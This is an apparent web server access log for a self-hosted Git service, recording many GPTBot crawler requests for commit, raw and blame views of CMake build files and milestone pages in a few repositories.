git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14029] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14029] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11165] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11186] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11489] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11490] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10092] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11167] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11487] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14029] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10013] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10088] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:45:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10522] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:45:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10523] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10008] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10086] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10524] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" +[17/Feb/2026:16:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:16:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10094] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13297] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11182] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14028] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug%2fnet8.0%2fOpcUaMinimal.AssemblyInfo.cs" [Client 74.7.227.38] [Length 22159] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfo.cs" +[17/Feb/2026:16:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?state=closed" [Client 74.7.227.38] [Length 8470] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones" +[17/Feb/2026:16:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10602] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:16:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?state=all" [Client 74.7.227.38] [Length 8474] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones" +[17/Feb/2026:16:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main" +[17/Feb/2026:16:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main" +[17/Feb/2026:16:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main" +[17/Feb/2026:16:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main" +[17/Feb/2026:16:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14029] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:16:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 10093] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:45:26 +0000] - 200 200 - 